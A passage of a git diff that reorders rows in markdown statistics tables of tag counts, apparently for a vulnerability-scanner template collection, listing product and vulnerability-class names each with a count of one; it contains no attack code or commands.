sprintful | 1 | | | | | | | | | -| blue-ocean | 1 | | | | | | | | | -| portainer | 1 | | | | | | | | | -| svnserve | 1 | | | | | | | | | -| hortonworks | 1 | | | | | | | | | -| ns | 1 | | | | | | | | | -| webadmin | 1 | | | | | | | | | -| kafdrop | 1 | | | | | | | | | -| gitlist | 1 | | | | | | | | | -| grails | 1 | | | | | | | | | -| ricoh | 1 | | | | | | | | | -| bookstack | 1 | | | | | | | | | -| ghost | 1 | | | | | | | | | -| liferay | 1 | | | | | | | | | -| websvn | 1 | | | | | | | | | -| dvr | 1 | | | | | | | | | -| concrete | 1 | | | | | | | | | -| webmin | 1 | | | | | | | | | -| ulterius | 1 | | | | | | | | | -| spectracom | 1 | | | | | | | | | -| nexusdb | 1 | | | | | | | | | -| cgi | 1 | | | | | | | | | -| azkaban | 1 | | | | | | | | | -| jquery | 1 | | | | | | | | | -| redwood | 1 | | | | | | | | | -| payara | 1 | | | | | | | | | -| qdpm | 1 | | | | | | | | | -| simplecrm | 1 | | | | | | | | | -| zcms | 1 | | | | | | | | | -| cofax | 1 | | | | | | | | | -| nette | 1 | | | | | | | | | -| mara | 1 | | | | | | | | | -| dompdf | 1 | | | | | | | | | -| codemeter | 1 | | | | | | | | | -| pippoint | 1 | | | | | | | | | -| commax | 1 | | | | | | | | | -| mirai | 1 | | | | | | | | | -| huijietong | 1 | | | | | | | | | -| oneblog | 1 | | | | | | | | | -| biometrics | 1 | | | | | | | | | -| darkstat | 1 | | | | | | | | | -| phpinfo | 1 | | | | | | | | | -| mobileiron | 1 | | | | | | | | | -| mantisbt | 1 | | | | | | | | | -| bolt | 1 | | | | | | | | | -| codeigniter | 1 | | | | | | | | | -| linksys | 1 | | | | | | | | | -| traefik | 1 | | | | | | | | | -| heroku | 1 | | | | | | | | | -| metinfo | 1 | | | | | | | | | -| finereport | 1 | | | | | | | | | -| plone | 1 | | | | | | | | | -| cse | 1 | | | | | | | | | -| opm | 1 | | | | | | | | | -| triconsole | 1 | | | | | | | | | -| dotnetnuke | 1 | | | | | | | | | -| xiuno | 1 | | | | | | | | | -| opensmtpd | 1 | | | | | | | | | -| phpfusion | 1 | | | | | | | | | -| faraday | 1 | | | | | | | | | -| fastapi | 1 | | | | | | | | | -| ioncube | 1 | | | | | | | | | -| centos | 1 | | | | | | | | | -| visionhub | 1 | | | | | | | | | -| smartsense | 1 | | | | | | | | | -| postgres | 1 | | | | | | | | | -| thinkadmin | 1 | | | | | | | | | -| aspnuke | 1 | | | | | | | | | -| duomicms | 1 | | | | | | | | | -| xmlchart | 1 | | | | | | | | | -| lansweeper | 1 | | | | | | | | | -| tjws | 1 | | | | | | | | | -| ems | 1 | | | | | | | | | -| nuuo | 1 | | | | | | | | | -| phalcon | 1 | | | | | | | | | -| qcubed | 1 | | | | | | | | | -| sqlite | 1 | | | | | | | | | -| dbeaver | 1 | | | | | | | | | -| aruba | 1 | | | | | | | | | -| spip | 1 | | | | | | | | | -| mysql | 1 | | | | | | | | | -| ueditor | 1 | | | | | | | | | -| springframework | 1 | | | | | | | | | -| chinaunicom | 1 | | | | | | | | | -| lutron | 1 | | | | | | | | | -| pulsesecure | 1 | | | | | | | | | -| jnoj | 1 | | | | | | | | | -| cve2006 | 1 | | | | | | | | | -| camunda | 1 | | | | | | | | | -| stem | 1 | | | | | | | | | -| plastic | 1 | | | | | | | | | -| rhymix | 1 | | | | | | | | | -| moin | 1 | | | | | | | | | -| kerbynet | 1 | | | | | | | | | -| socomec | 1 | | | | | | | | | -| fortiweb | 1 | | | | | | | | | -| feifeicms | 1 | | | | | | | | | -| circontrol | 1 | | | | | | | | | -| trilithic | 1 | | | | | | | | | -| harbor | 1 | | | | | | | | | -| skywalking | 1 | | | | | | | | | -| jfrog | 1 | | | | | | | | | -| sceditor | 1 | | | | | | | | | -| argussurveillance | 1 | | | | | | | | | -| nweb2fax | 1 | | | | | | | | | -| csod | 1 | | | | | | | | | -| domxss | 1 | | | | | | | | | -| expressjs | 1 | | | | | | | | | -| yealink | 1 | | | | | | | | | -| xdcms | 1 | | | | | | | | | -| eyelock | 1 | | | | | | | | | -| exacqvision | 1 | | | | | | | | | -| nc2 | 1 | | | | | | | | | -| commscope | 1 | | | | | | | | | -| acexy | 1 | | | | | | | | | -| solman | 1 | | | | | | | | | -| viewlinc | 1 | | | | | | | | | -| netdata | 1 | | | | | | | | | -| cloudflare | 1 | | | | | | | | | -| servicedesk | 1 | | | | | | | | | -| ganglia | 1 | | | | | | | | | -| cyberoam | 1 | | | | | | | | | -| xml | 1 | | | | | | | | | -| linkedin | 1 | | | | | | | | | -| kong | 1 | | | | | | | | | -| parentlink | 1 | | | | | | | | | -| openemr | 1 | | | | | | | | | -| sgp | 1 | | | | | | | | | -| h3c-imc | 1 | | | | | | | | | -| netgenie | 1 | | | | | | | | | -| robomongo | 1 | | | | | | | | | -| wondercms | 1 | | | | | | | | | -| pcoip | 1 | | | | | | | | | -| bitly | 1 | | | | | | | | | -| alerta | 1 | | | | | | | | | -| druid | 1 | | | | | | | | | -| oscommerce | 1 | | | | | | | | | -| cors | 1 | | | | | | | | | -| fedora | 1 | | | | | | | | | -| gespage | 1 | | | | | | | | | -| trane | 1 | | | | | | | | | -| mantis | 1 | | | | | | | | | -| jmx | 1 | | | | | | | | | -| iptime | 1 | | | | | | | | | -| dotclear | 1 | | | | | | | | | -| ilo4 | 1 | | | | | | | | | -| camera | 1 | | | | | | | | | -| zarafa | 1 | | | | | | | | | -| default | 1 | | | | | | | | | -| livezilla | 1 | | | | | | | | | -| wuzhicms | 1 | | | | | | | | | -| smartblog | 1 | | | | | | | | | -| nedi | 1 | | | | | | | | | -| appweb | 1 | | | | | | | | | -| shopxo | 1 | | | | | | | | | -| mailchimp | 1 | | | | | | | | | -| fortinet | 1 | | | | | | | | | -| bruteforce | 1 | | | | | | | | | -| sentry | 1 | | | | | | | | | -| default-login | 1 | | | | | | | | | -| sar2html | 1 | | | | | | | | | -| fastcgi | 1 | | | | | | | | | -| lotuscms | 1 | | | | | | | | | -| jsp | 1 | | | | | | | | | -| bash | 1 | | | | | | | | | -| crm | 1 | | | | | | | | | -| zookeeper | 1 | | | | | | | | | -| zeroshell | 1 | | | | | | | | | -| qvisdvr | 1 | | | | | | | | | -| qsan | 1 | | | | | | | | | -| b2evolution | 1 | | | | | | | | | -| drone | 1 | | | | | | | | | -| etouch | 1 | | | | | | | | | -| zenario | 1 | | | | | | | | | -| visualtools | 1 | | | | | | | | | -| wavlink | 1 | | | | | | | | | -| empirecms | 1 | | | | | | | | | -| openrestry | 1 | | | | | | | | | -| nps | 1 | | | | | | | | | -| apiman | 1 | | | | | | | | | -| xunchi | 1 | | | | | | | | | -| wooyun | 1 | | | | | | | | | -| zm | 1 | | | | | | | | | -| sage | 1 | | | | | | | | | -| pacsone | 1 | | | | | | | | | -| expn | 1 | | | | | | | | | -| manageengine | 1 | | | | | | | | | -| uwsgi | 1 | | | | | | | | | -| tongda | 1 | | | | | | | | | -| eyou | 1 | | | | | | | | | -| mdb | 1 | | | | | | | | | -| fiori | 1 | | | | | | | | | -| esmtp | 1 | | | | | | | | | -| starttls | 1 | | | | | | | | | -| mpsec | 1 | | | | | | | | | -| ewebs | 1 | | | | | | | | | -| timesheet | 1 | | | | | | | | | -| episerver | 1 | | | | | | | | | -| sureline | 1 | | | | | | | | | -| tensorflow | 1 | | | | | | | | | -| memcached | 1 | | | | | | | | | -| checkpoint | 1 | | | | | | | | | -| scs | 1 | | | | | | | | | -| wavemaker | 1 | | | | | | | | | -| kyan | 1 | | | | | | | | | -| sarg | 1 | | | | | | | | | -| dvwa | 1 | | | | | | | | | -| mongoshake | 1 | | | | | | | | | -| hiboss | 1 | | | | | | | | | -| opencast | 1 | | | | | | | | | -| bazarr | 1 | | | | | | | | | -| getsimple | 1 | | | | | | | | | -| plc | 1 | | | | | | | | | -| opentsdb | 1 | | | | | | | | | -| sidekiq | 1 | | | | | | | | | -| embedthis | 1 | | | | | | | | | -| saltapi | 1 | | | | | | | | | -| idemia | 1 | | | | | | | | | -| apos | 1 | | | | | | | | | -| sangfor | 1 | | | | | | | | | -| landrayoa | 1 | | | | | | | | | -| acontent | 1 | | | | | | | | | -| eprints | 1 | | | | | | | | | -| spring | 1 | | | | | | | | | -| adb | 1 | | | | | | | | | -| javascript | 1 | | | | | | | | | -| turbocrm | 1 | | | | | | | | | -| sitecore | 1 | | | | | | | | | -| fortilogger | 1 | | | | | | | | | -| blackboard | 1 | | | | | | | | | -| keenetic | 1 | | | | | | | | | -| tectuus | 1 | | | | | | | | | -| tensorboard | 1 | | | | | | | | | -| accela | 1 | | | | | | | | | -| clickhouse | 1 | | | | | | | | | -| openerp | 1 | | | | | | | | | -| enum | 1 | | | | | | | | | -| cherokee | 1 | | | | | | | | | -| mariadb | 1 | | | | | | | | | -| setup | 1 | | | | | | | | | -| dnssec | 1 | | | | | | | | | -| timeclock | 1 | | | | | | | | | -| favicon | 1 | | | | | | | | | -| webmodule-ee | 1 | | | | | | | | | -| arl | 1 | | | | | | | | | -| diris | 1 | | | | | | | | | -| powercreator | 1 | | | | | | | | | -| comodo | 1 | | | | | | | | | -| miscrsoft | 1 | | | | | | | | | -| flink | 1 | | | | | | | | | -| froxlor | 1 | | | | | | | | | -| phpunit | 1 | | | | | | | | | -| anchorcms | 1 | | | | | | | | | -| doh | 1 | | | | | | | | | -| solarlog | 1 | | | | | | | | | -| rfi | 1 | | | | | | | | | -| api-manager | 1 | | | | | | | | | -| wazuh | 1 | | | | | | | | | -| maccmsv10 | 1 | | | | | | | | | -| servicenow | 1 | | | | | | | | | -| woocomernce | 1 | | | | | | | | | -| twitter-server | 1 | | | | | | | | | -| totaljs | 1 | | | | | | | | | -| ruckus | 1 | | | | | | | | | -| pagespeed | 1 | | | | | | | | | -| wing-ftp | 1 | | | | | | | | | -| synnefo | 1 | | | | | | | | | -| hadoop | 1 | | | | | | | | | -| processmaker | 1 | | | | | | | | | -| bigbluebutton | 1 | | | | | | | | | -| wiki | 1 | | | | | | | | | -| k8s | 1 | | | | | | | | | -| openstack | 1 | | | | | | | | | -| rujjie | 1 | | | | | | | | | -| opensns | 1 | | | | | | | | | | exponentcms | 1 | | | | | | | | | -| mautic | 1 | | | | | | | | | -| razor | 1 | | | | | | | | | -| majordomo2 | 1 | | | | | | | | | -| soar | 1 | | | | | | | | | -| myucms | 1 | | | | | | | | | -| emc | 1 | | | | | | | | | -| interlib | 1 | | | | | | | | | -| exposures | 1 | | | | | | | | | -| optiLink | 1 | | | | | | | | | -| floc | 1 | | | | | | | | | -| nomad | 1 | | | | | | | | | -| cerebro | 1 | | | | | | | | | -| rdp | 1 | | | | | | | | | -| monitorr | 1 | | | | | | | | | -| tika | 1 | | | | | | | | | -| avtech | 1 | | | | | | | | | -| kubeflow | 1 | | | | | | | | | -| tpshop | 1 | | | | | | | | | -| cloudinary | 1 | | | | | | | | | -| circontrorl | 1 | | | | | | | | | -| zyxel | 1 | | | | | | | | | -| webftp | 1 | | | | | | | | | -| labtech | 1 | | | | | | | | | +| rsyncd | 1 | | | | | | | | | +| prtg | 1 | | | | | | | | | | clave | 1 | | | | | | | | | -| whm | 1 | | | | | | | | | -| beanshell | 1 | | | | | | | | | -| linux | 1 | | | | | | | | | -| jeewms | 1 | | | | | | | | | -| nordex | 1 | | | | | | | | | -| 2014 | 1 | | | | | | | | | -| ambari | 1 | | | | | | | | | -| landray | 1 | | | | | | | | | -| gogs | 1 | | | | | | | | | -| subrion | 1 | | | | | | | | | -| viewpoint | 1 | | | | | | | | | -| seacms | 1 | | | | | | | | | -| dotnet | 1 | | | | | | | | | -| couchbase | 1 | | | | | | | | | -| alibaba | 1 | | | | | | | | | -| netsweeper | 1 | | | | | | | | | -| wamp | 1 | | | | | | | | | -| nuxeo | 1 | | | | | | | | | -| plugin | 1 | | | | | | | | | -| spidercontrol | 1 | | | | | | | | | -| redcap | 1 | | | | | | | | | -| yii | 1 | | | | | | | | | -| moinmoin | 1 | | | | | | | | | -| sourcebans | 1 | | | | | | | | | -| sophos | 1 | | | | | | | | | -| erp-nc | 1 | | | | | | | | | -| jenkin | 1 | | | | | | | | | +| vnc | 1 | | | | | | | | | +| alertmanager | 1 | | | | | | | | | +| scimono | 1 | | | | | | | | | +| vsphere | 1 | | | | | | | | | +| nc2 | 1 | | | | | | | | | +| spf | 1 | | | | | | | | | +| influxdb | 1 | | | | | | | | | +| gloo | 1 | | | | | | | | | +| cacti | 1 | | | | | | | | | +| netrc | 1 | | | | | | | | | +| eprints | 1 | | | | | | | | | +| turbocrm | 1 | | | | | | | | | +| dom | 1 | | | | | | | | | | nsasg | 1 | | | | | | | | | -| 74cms | 1 | | | | | | | | | -| rmi | 1 | | | | | | | | | -| zte | 1 | | | | | | | | | -| wildfly | 1 | | | | | | | | | -| asus | 1 | | | | | | | | | -| avalanche | 1 | | | | | | | | | -| webui | 1 | | | | | | | | | -| discord | 1 | | | | | | | | | +| tenda | 1 | | | | | | | | | +| xml | 1 | | | | | | | | | +| cse | 1 | | | | | | | | | +| openemr | 1 | | | | | | | | | +| enumeration | 1 | | | | | | | | | +| zcms | 1 | | | | | | | | | +| sqlite | 1 | | | | | | | | | +| sage | 1 | | | | | | | | | +| achecker | 1 | | | | | | | | | +| xunchi | 1 | | | | | | | | | +| maccmsv10 | 1 | | | | | | | | | +| erp-nc | 1 | | | | | | | | | +| plastic | 1 | | | | | | | | | +| weiphp | 1 | | | | | | | | | +| circontrol | 1 | | | | | | | | | +| zyxel | 1 | | | | | | | | | +| emby | 1 | | | | | | | | | +| sitecore | 1 | | | | | | | | | +| myucms | 1 | | | | | | | | | +| tensorflow | 1 | | | | | | | | | +| haproxy | 1 | | | | | | | | | +| 2014 | 1 | | | | | | | | | +| cherokee | 1 | | | | | | | | | +| lotuscms | 1 | | | | | | | | | +| sophos | 1 | | | | | | | | | +| jquery | 1 | | | | | | | | | +| enum | 1 | | | | | | | | | +| keenetic | 1 | | | | | | | | | +| upload | 1 | | | | | | | | | +| acexy | 1 | | | | | | | | | +| comodo | 1 | | | | | | | | | +| mysql | 1 | | | | | | | | | +| opentsdb | 1 | | | | | | | | | +| mariadb | 1 | | | | | | | | | +| flash | 1 | | | | | | | | | +| trane | 1 | | | | | | | | | +| gateone | 1 | | | | | | | | | +| gridx | 1 | | | | | | | | | +| phpinfo | 1 | | | | | | | | | +| rujjie | 1 | | | | | | | | | +| office365 | 1 | | | | | | | | | +| soar | 1 | | | | | | | | | +| scs | 1 | | | | | | | | | +| bookstack | 1 | | | | | | | | | +| qvisdvr | 1 | | | | | | | | | +| klog | 1 | | | | | | | | | +| zookeeper | 1 | | | | | | | | | +| sureline | 1 | | | | | | | | | +| checkpoint | 1 | | | | | | | | | +| smartsense | 1 | | | | | | | | | +| arl | 1 | | | | | | | | | +| trilithic | 1 | | | | | | | | | +| miscrsoft | 1 | | | | | | | | | | phpfastcache | 1 | | | | | | | | | -| fuelcms | 1 | | | | | | | | | -| cocoon | 1 | | | | | | | | | +| linksys | 1 | | | | | | | | | +| zend | 1 | | | | | | | | | +| qcubed | 1 | | | | | | | | | +| gitlist | 1 | | | | | | | | | +| lansweeper | 1 | | | | | | | | | +| yii | 1 | | | | | | | | | +| ssl | 1 | | | | | | | | | +| mara | 1 | | | | | | | | | +| opensmtpd | 1 | | | | | | | | | +| mpsec | 1 | | | | | | | | | +| tongda | 1 | | | | | | | | | +| clickhouse | 1 | | | | | | | | | +| visualtools | 1 | | | | | | | | | +| concrete | 1 | | | | | | | | | +| flink | 1 | | | | | | | | | +| sidekiq | 1 | | | | | | | | | +| razor | 1 | | | | | | | | | +| cyberoam | 1 | | | | | | | | | +| kubeflow | 1 | | | | | | | | | +| mdb | 1 | | | | | | | | | +| lutron | 1 | | | | | | | | | +| lancom | 1 | | | | | | | | | +| yachtcontrol | 1 | | | | | | | | | +| mantis | 1 | | | | | | | | | +| moinmoin | 1 | | | | | | | | | +| commscope | 1 | | | | | | | | | +| drone | 1 | | | | | | | | | +| twitter-server | 1 | | | | | | | | | +| discord | 1 | | | | | | | | | +| webui | 1 | | | | | | | | | +| expn | 1 | | | | | | | | | +| vidyo | 1 | | | | | | | | | +| fastcgi | 1 | | | | | | | | | +| woocomernce | 1 | | | | | | | | | +| solman | 1 | | | | | | | | | +| tileserver | 1 | | | | | | | | | +| mirai | 1 | | | | | | | | | +| fortinet | 1 | | | | | | | | | +| spip | 1 | | | | | | | | | +| feifeicms | 1 | | | | | | | | | +| fortiweb | 1 | | | | | | | | | +| rdp | 1 | | | | | | | | | +| favicon | 1 | | | | | | | | | +| servicedesk | 1 | | | | | | | | | +| alibaba | 1 | | | | | | | | | +| owasp | 1 | | | | | | | | | +| crm | 1 | | | | | | | | | +| linux | 1 | | | | | | | | | +| default-login | 1 | | | | | | | | | +| jnoj | 1 | | | | | | | | | +| chevereto | 1 | | | | | | | | | +| stem | 1 | | | | | | | | | +| expressjs | 1 | | | | | | | | | +| clockwatch | 1 | | | | | | | | | +| postgres | 1 | | | | | | | | | +| rabbitmq | 1 | | | | | | | | | +| centreon | 1 | | | | | | | | | +| auth | 1 | | | | | | | | | +| bazarr | 1 | | | | | | | | | +| octobercms | 1 | | | | | | | | | +| upnp | 1 | | | | | | | | | +| visionhub | 1 | | | | | | | | | +| phalcon | 1 | | | | | | | | | +| ems | 1 | | | | | | | | | +| szhe | 1 | | | | | | | | | +| viewpoint | 1 | | | | | | | | | +| clusterengine | 1 | | | | | | | | | +| starttls | 1 | | | | | | | | | +| jenkin | 1 | | | | | | | | | +| kyan | 1 | | | | | | | | | +| qdpm | 1 | | | | | | | | | +| oscommerce | 1 | | | | | | | | | +| servicenow | 1 | | | | | | | | | +| cerebro | 1 | | | | | | | | | +| webftp | 1 | | | | | | | | | +| dotnet | 1 | | | | | | | | | +| memcached | 1 | | | | | | | | | +| robomongo | 1 | | | | | | | | | +| floc | 1 | | | | | | | | | +| openstack | 1 | | | | | | | | | +| cloudinary | 1 | | | | | | | | | +| duomicms | 1 | | | | | | | | | +| blue-ocean | 1 | | | | | | | | | +| powercreator | 1 | | | | | | | | | +| tamronos | 1 | | | | | | | | | +| redcap | 1 | | | | | | | | | +| csrf | 1 | | | | | | | | | +| sceditor | 1 | | | | | | | | | +| htmli | 1 | | | | | | | | | +| camera | 1 | | | | | | | | | +| dnssec | 1 | | | | | | | | | +| exacqvision | 1 | | | | | | | | | +| fortilogger | 1 | | | | | | | | | +| svn | 1 | | | | | | | | | +| majordomo2 | 1 | | | | | | | | | +| exposures | 1 | | | | | | | | | +| default | 1 | | | | | | | | | +| hiawatha | 1 | | | | | | | | | +| ewebs | 1 | | | | | | | | | +| mongoshake | 1 | | | | | | | | | +| opencast | 1 | | | | | | | | | +| javamelody | 1 | | | | | | | | | +| empirecms | 1 | | | | | | | | | +| ganglia | 1 | | | | | | | | | | bullwark | 1 | | | | | | | | | +| tensorboard | 1 | | | | | | | | | +| fedora | 1 | | | | | | | | | +| diris | 1 | | | | | | | | | +| opensns | 1 | | | | | | | | | +| cocoon | 1 | | | | | | | | | +| wing-ftp | 1 | | | | | | | | | +| nomad | 1 | | | | | | | | | +| tjws | 1 | | | | | | | | | +| vsftpd | 1 | | | | | | | | | +| svnserve | 1 | | | | | | | | | +| zzzcms | 1 | | | | | | | | | +| pippoint | 1 | | | | | | | | | +| hadoop | 1 | | | | | | | | | +| zmanda | 1 | | | | | | | | | +| wifisky | 1 | | | | | | | | | +| darkstat | 1 | | | | | | | | | +| sarg | 1 | | | | | | | | | +| smi | 1 | | | | | | | | | +| magicflow | 1 | | | | | | | | | +| perl | 1 | | | | | | | | | +| plone | 1 | | | | | | | | | +| huijietong | 1 | | | | | | | | | +| fortigate | 1 | | | | | | | | | +| krweb | 1 | | | | | | | | | +| nordex | 1 | | | | | | | | | +| jfrog | 1 | | | | | | | | | +| wavlink | 1 | | | | | | | | | +| camunda | 1 | | | | | | | | | +| extractor | 1 | | | | | | | | | +| wiki | 1 | | | | | | | | | +| froxlor | 1 | | | | | | | | | +| redwood | 1 | | | | | | | | | +| kong | 1 | | | | | | | | | +| mobileiron | 1 | | | | | | | | | +| salesforce | 1 | | | | | | | | | +| ambari | 1 | | | | | | | | | +| pacsone | 1 | | | | | | | | | +| saltapi | 1 | | | | | | | | | +| sar2html | 1 | | | | | | | | | +| rmi | 1 | | | | | | | | | +| ruby | 1 | | | | | | | | | +| db | 1 | | | | | | | | | +| processmaker | 1 | | | | | | | | | +| cgi | 1 | | | | | | | | | +| apiman | 1 | | | | | | | | | +| portainer | 1 | | | | | | | | | +| elascticsearch | 1 | | | | | | | | | +| nette | 1 | | | | | | | | | +| mantisbt | 1 | | | | | | | | | +| simplecrm | 1 | | | | | | | | | +| centos | 1 | | | | | | | | | +| netsweeper | 1 | | | | | | | | | +| emc | 1 | | | | | | | | | +| tika | 1 | | | | | | | | | +| zeroshell | 1 | | | | | | | | | +| aura | 1 | | | | | | | | | +| tracer | 1 | | | | | | | | | +| octoprint | 1 | | | | | | | | | +| sgp | 1 | | | | | | | | | +| pagespeed | 1 | | | | | | | | | +| shopxo | 1 | | | | | | | | | +| acme | 1 | | | | | | | | | +| argussurveillance | 1 | | | | | | | | | +| jmx | 1 | | | | | | | | | +| realteo | 1 | | | | | | | | | +| cve2006 | 1 | | | | | | | | | +| opm | 1 | | | | | | | | | +| xff | 1 | | | | | | | | | +| dbeaver | 1 | | | | | | | | | +| xmlchart | 1 | | | | | | | | | +| heroku | 1 | | | | | | | | | +| linkedin | 1 | | | | | | | | | +| iceflow | 1 | | | | | | | | | +| ilo4 | 1 | | | | | | | | | +| chinaunicom | 1 | | | | | | | | | +| owa | 1 | | | | | | | | | +| asus | 1 | | | | | | | | | +| monitorix | 1 | | | | | | | | | +| mautic | 1 | | | | | | | | | +| dotclear | 1 | | | | | | | | | +| labtech | 1 | | | | | | | | | +| traefik | 1 | | | | | | | | | +| tpshop | 1 | | | | | | | | | +| phpfusion | 1 | | | | | | | | | +| phpunit | 1 | | | | | | | | | +| eyelock | 1 | | | | | | | | | +| spidercontrol | 1 | | | | | | | | | +| wamp | 1 | | | | | | | | | +| livezilla | 1 | | | | | | | | | +| plc | 1 | | | | | | | | | +| cobub | 1 | | | | | | | | | +| ulterius | 1 | | | | | | | | | +| idemia | 1 | | | | | | | | | +| nuuo | 1 | | | | | | | | | +| wildfly | 1 | | | | | | | | | +| expose | 1 | | | | | | | | | +| sprintful | 1 | | | | | | | | | +| wmt | 1 | | | | | | | | | +| st | 1 | | | | | | | | | +| mongo | 1 | | | | | | | | | +| dompdf | 1 | | | | | | | | | +| ricoh | 1 | | | | | | | | | +| panabit | 1 | | | | | | | | | +| oneblog | 1 | | | | | | | | | +| sangfor | 1 | | | | | | | | | +| acontent | 1 | | | | | | | | | +| jsp | 1 | | | | | | | | | +| geutebruck | 1 | | | | | | | | | +| nuxeo | 1 | | | | | | | | | +| rfi | 1 | | | | | | | | | +| ssltls | 1 | | | | | | | | | +| zte | 1 | | | | | | | | | +| couchbase | 1 | | | | | | | | | +| kerbynet | 1 | | | | | | | | | +| proftpd | 1 | | | | | | | | | +| metinfo | 1 | | | | | | | | | +| parentlink | 1 | | | | | | | | | +| fiori | 1 | | | | | | | | | +| manageengine | 1 | | | | | | | | | +| esmtp | 1 | | | | | | | | | +| swagger | 1 | | | | | | | | | +| accela | 1 | | | | | | | | | +| grails | 1 | | | | | | | | | +| commax | 1 | | | | | | | | | +| timesheet | 1 | | | | | | | | | +| resourcespace | 1 | | | | | | | | | +| spectracom | 1 | | | | | | | | | +| bitly | 1 | | | | | | | | | +| announcekit | 1 | | | | | | | | | +| ruckus | 1 | | | | | | | | | +| lanproxy | 1 | | | | | | | | | +| sourcebans | 1 | | | | | | | | | +| nedi | 1 | | | | | | | | | +| druid | 1 | | | | | | | | | +| aspnuke | 1 | | | | | | | | | +| dvwa | 1 | | | | | | | | | +| nweb2fax | 1 | | | | | | | | | +| websvn | 1 | | | | | | | | | +| thinkadmin | 1 | | | | | | | | | +| email | 1 | | | | | | | | | +| viewlinc | 1 | | | | | | | | | +| panos | 1 | | | | | | | | | +| openerp | 1 | | | | | | | | | +| geddy | 1 | | | | | | | | | +| cors | 1 | | | | | | | | | +| wondercms | 1 | | | | | | | | | +| payara | 1 | | | | | | | | | +| varnish | 1 | | | | | | | | | +| selea | 1 | | | | | | | | | +| redis | 1 | | | | | | | | | +| zarafa | 1 | | | | | | | | | +| getsimple | 1 | | | | | | | | | +| circontrorl | 1 | | | | | | | | | +| openx | 1 | | | | | | | | | +| webmodule-ee | 1 | | | | | | | | | +| pgadmin | 1 | | | | | | | | | +| k8s | 1 | | | | | | | | | +| bedita | 1 | | | | | | | | | +| sco | 1 | | | | | | | | | +| cves2016 | 1 | | | | | | | | | +| mailchimp | 1 | | | | | | | | | +| netmask | 1 | | | | | | | | | +| harbor | 1 | | | | | | | | | +| xdcms | 1 | | | | | | | | | +| azkaban | 1 | | | | | | | | | +| bolt | 1 | | | | | | | | | +| lg-nas | 1 | | | | | | | | | +| anchorcms | 1 | | | | | | | | | +| moin | 1 | | | | | | | | | +| jeewms | 1 | | | | | | | | | +| calendarix | 1 | | | | | | | | | +| tectuus | 1 | | | | | | | | | +| beanshell | 1 | | | | | | | | | +| hiboss | 1 | | | | | | | | | +| ioncube | 1 | | | | | | | | | +| optiLink | 1 | | | | | | | | | +| rmc | 1 | | | | | | | | | +| yealink | 1 | | | | | | | | | +| skywalking | 1 | | | | | | | | | +| redhat | 1 | | | | | | | | | +| hortonworks | 1 | | | | | | | | | +| h3c-imc | 1 | | | | | | | | | +| totaljs | 1 | | | | | | | | | +| goahead | 1 | | | | | | | | | +| doh | 1 | | | | | | | | | +| ns | 1 | | | | | | | | | +| uwsgi | 1 | | | | | | | | | +| apos | 1 | | | | | | | | | +| node-red-dashboard | 1 | | | | | | | | | +| jenzabar | 1 | | | | | | | | | +| wooyun | 1 | | | | | | | | | +| embedthis | 1 | | | | | | | | | +| adminer | 1 | | | | | | | | | +| landrayoa | 1 | | | | | | | | | +| landray | 1 | | | | | | | | | +| domxss | 1 | | | | | | | | | +| iptime | 1 | | | | | | | | | +| cofax | 1 | | | | | | | | | +| spring | 1 | | | | | | | | | +| javafaces | 1 | | | | | | | | | +| glances | 1 | | | | | | | | | +| gotmls | 1 | | | | | | | | | +| wuzhicms | 1 | | | | | | | | | +| graphite | 1 | | | | | | | | | +| ghost | 1 | | | | | | | | | +| synnefo | 1 | | | | | | | | | +| lighttpd | 1 | | | | | | | | | +| zenario | 1 | | | | | | | | | +| aruba | 1 | | | | | | | | | +| eyou | 1 | | | | | | | | | +| netdata | 1 | | | | | | | | | +| webadmin | 1 | | | | | | | | | +| sentry | 1 | | | | | | | | | +| pulsesecure | 1 | | | | | | | | | +| b2evolution | 1 | | | | | | | | | +| kafdrop | 1 | | | | | | | | | +| csod | 1 | | | | | | | | | +| tieline | 1 | | | | | | | | | +| fortigates | 1 | | | | | | | | | +| liferay | 1 | | | | | | | | | +| subrion | 1 | | | | | | | | | +| plugin | 1 | | | | | | | | | +| faraday | 1 | | | | | | | | | +| ecom | 1 | | | | | | | | | +| tapestry | 1 | | | | | | | | | +| episerver | 1 | | | | | | | | | +| zm | 1 | | | | | | | | | +| setup | 1 | | | | | | | | | +| blind | 1 | | | | | | | | | +| triconsole | 1 | | | | | | | | | +| socomec | 1 | | | | | | | | | +| webmin | 1 | | | | | | | | | +| mediumish | 1 | | | | | | | | | +| discourse | 1 | | | | | | | | | +| pcoip | 1 | | | | | | | | | +| k8 | 1 | | | | | | | | | +| jitsi | 1 | | | | | | | | | +| rhymix | 1 | | | | | | | | | +| postmessage | 1 | | | | | | | | | +| dvr | 1 | | | | | | | | | +| fuelcms | 1 | | | | | | | | | +| ilo | 1 | | | | | | | | | +| seacms | 1 | | | | | | | | | +| ntopng | 1 | | | | | | | | | +| javascript | 1 | | | | | | | | | +| addpac | 1 | | | | | | | | | +| pyramid | 1 | | | | | | | | | +| adb | 1 | | | | | | | | | +| openrestry | 1 | | | | | | | | | +| gespage | 1 | | | | | | | | | +| xiuno | 1 | | | | | | | | | +| rubedo | 1 | | | | | | | | | +| xvr | 1 | | | | | | | | | +| wazuh | 1 | | | | | | | | | +| dotnetnuke | 1 | | | | | | | | | +| wavemaker | 1 | | | | | | | | | +| appweb | 1 | | | | | | | | | +| ueditor | 1 | | | | | | | | | +| timeclock | 1 | | | | | | | | | +| gogs | 1 | | | | | | | | | +| nps | 1 | | | | | | | | | +| fastapi | 1 | | | | | | | | | +| monitorr | 1 | | | | | | | | | +| craftcms | 1 | | | | | | | | | +| bigbluebutton | 1 | | | | | | | | | +| whm | 1 | | | | | | | | | +| meraki | 1 | | | | | | | | | +| vscode | 1 | | | | | | | | | +| blackboard | 1 | | | | | | | | | +| alerta | 1 | | | | | | | | | +| shopware | 1 | | | | | | | | | +| qsan | 1 | | | | | | | | | +| avalanche | 1 | | | | | | | | | +| logontracer | 1 | | | | | | | | | +| springframework | 1 | | | | | | | | | +| bruteforce | 1 | | | | | | | | | +| biometrics | 1 | | | | | | | | | +| netgenie | 1 | | | | | | | | | +| finereport | 1 | | | | | | | | | +| avtech | 1 | | | | | | | | | +| codemeter | 1 | | | | | | | | | diff --git a/TOP-10.md b/TOP-10.md index 69f64f98aa..869329e073 100644 --- a/TOP-10.md +++ b/TOP-10.md @@ -1,12 +1,12 @@ | TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT | |-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------| -| cve | 649 | dhiyaneshdk | 245 | cves | 657 | info | 610 | http | 1833 | -| panel | 236 | pikpikcu | 